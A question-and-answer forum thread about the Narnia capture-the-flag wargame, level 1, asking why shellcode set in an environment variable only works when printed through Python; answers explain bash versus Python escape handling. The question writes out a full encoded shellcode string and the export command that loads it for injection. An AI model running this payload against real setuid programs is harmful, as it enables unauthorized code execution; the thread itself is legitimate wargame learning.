# Why do we print shellcode with python before executing it?

Tags: python, c, buffer-overflow

I am currently working through the Narnia CTF. I am on level 1. In level 1, we have a program that calls an environmental variable. We are allowed to change this environmental variable. When I try to set the environmental variable to some hex-code like so, the program throws a seg-fault.

```
export EGG="\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
```

I looked online, and it seems that people generate shellcode by having python print it, and then storing that as a command. When I do this with the above shellcode, it looks like this:

```
export EGG=$(python -c 'print "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"')
```

When I do it this second way, the program runs successfully. Can someone explain how these two commands are different? Thanks!

Comment: Tip: `perl -e'print pack "H"*, "eb11..."` is far shorter than `python -c 'print "\xeb\x11..."'`

Comment: This could also be done with a bash literal using ANSI C-style strings, and no need for Python at all

Answer (score 5, accepted):

`export EGG="\xeb\x11...` doesn't actually interpret the escape sequences. You're setting `EGG` to a string with literal backslashes and hex characters.

When you use `export EGG=$(python -c 'print "\xeb\x11...`, Python's only job is to interpret the escape sequences. Python receives an input with literal backslashes and hex characters, and performs Python string literal parsing, producing a string with the actual bytes you wanted.

Note that this code relies on using Python 2; Python 3 string handling is very different.

Answer (score 4):

It comes down to what you want in `EGG`.

---

```sh
export EGG="\xeb\x11"
```

places an 8 character string in `EGG` (`\`, `x`, `e`, `b`, `\`, `x`, `1`, `1`).

---

```sh
export EGG=$(python -c 'print "\xeb\x11"')
```

places a 2 character string in `EGG` (0xEB and 0x11, neither of which correspond to a printable ASCII character).